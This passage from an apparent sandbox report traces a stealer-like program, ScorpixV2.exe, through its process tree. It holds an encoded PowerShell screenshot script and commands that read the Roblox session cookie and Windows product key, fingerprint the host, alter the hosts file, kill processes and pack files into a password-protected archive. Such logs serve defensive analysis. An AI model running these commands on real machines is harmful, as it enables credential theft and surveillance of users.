JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:2264
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5524
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\awyhipwm\awyhipwm.cmdline"
        6⤵
        
        PID:6088
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17B4.tmp" "c:\Users\Admin\AppData\Local\Temp\awyhipwm\CSC8F8CE006E0744CD89B0E6B8A23C2FA.TMP"
        7⤵
        
        PID:5304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5676
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5752
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5892
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5936
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:6040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6056
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6108
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5144
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5708
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4688"
      4⤵
      PID:3932
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4688
        5⤵
        Kills process with taskkill
        
        PID:5488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4688"
      4⤵
      PID:5912
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4688
        5⤵
        Kills process with taskkill
        
        PID:5236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2500"
      4⤵
      PID:5596
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2500
        5⤵
        Kills process with taskkill
        
        PID:5180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2500"
      4⤵
      PID:5584
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2500
        5⤵
        Kills process with taskkill
        
        PID:5696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4160"
      4⤵
      PID:5404
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4160
        5⤵
        Kills process with taskkill
        
        PID:5860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4160"
      4⤵
      PID:5736
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4160
        5⤵
        Kills process with taskkill
        
        PID:2308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3644"
      4⤵
      PID:4064
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3644
        5⤵
        Kills process with taskkill
        
        PID:4704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3644"
      4⤵
      PID:2796
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3644
        5⤵
        Kills process with taskkill
        
        PID:2112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2616"
      4⤵
      PID:5712
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3464
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2616
        5⤵
        Kills process with taskkill
        
        PID:5708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2616"
      4⤵
      PID:4892
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2616
        5⤵
        Kills process with taskkill
        
        PID:5692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1488"
      4⤵
      PID:5504
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1488
        5⤵
        Kills process with taskkill
        
        PID:5176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1488"
      4⤵
      PID:5380
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1488
        5⤵
        Kills process with taskkill
        
        PID:1316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 652"
      4⤵
      PID:3288
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 652
        5⤵
        Kills process with taskkill
        
        PID:912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 652"
      4⤵
      PID:4112
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 652
        5⤵
        Kills process with taskkill
        
        PID:6108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:1812
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3092"
      4⤵
      PID:5900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3092
        5⤵
        Kills process with taskkill
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3092"
      4⤵
      PID:4836
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3092
        5⤵
        Kills process with taskkill
        
        PID:1364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2736"
      4⤵
      PID:6104
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2736
        5⤵
        Kills process with taskkill
        
        PID:6128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2736"
      4⤵
      PID:5332
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2736
        5⤵
        Kills process with taskkill
        
        PID:6012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:2228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50362\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\PTtqP.zip" *"
      4⤵
      PID:3048
    - - C:\Users\Admin\AppData\Local\Temp\_MEI50362\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI50362\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\PTtqP.zip" *
        5⤵
        Executes dropped EXE
        
        PID:3880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:5668
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:2052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:912
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:3752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5444
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:1244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:1600
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:5188
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4328
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Executes dropped EXE
  PID:3028
- - C:\Users\Admin\Downloads\ScorpixV2.exe
    "C:\Users\Admin\Downloads\ScorpixV2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2104

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1784

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:512

C:\Users\Admin\Downloads\ScorpixV2.exe
"C:\Users\Admin\Downloads\ScorpixV2.exe"
1⤵
- Executes dropped EXE
PID:5212
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1440

C:\Users\Admin\Downloads\ScorpixV2.exe
"C:\Users\Admin\Downloads\ScorpixV2.exe"
1⤵
- Executes dropped EXE
PID:2416
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Executes dropped EXE
  PID:5348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8f9f4cc40,0x7ff8f9f4cc4c,0x7ff8f9f4cc58
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,12883561193119825858,5849103300709148547,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1880 /prefetch:2
  2⤵
  PID:4492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1976,i,12883561193119825858,5849103300709148547,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  PID:1440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,12883561193119825858,5849103300709148547,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2472 /prefetch:8
  2⤵
  PID:2988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,12883561193119825858,5849103300709148547,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3128 /prefetch:1
  2⤵
  PID:2728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,12883561193119825858,5849103300709148547,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files\Google\Chrome\Application\chrome.exe
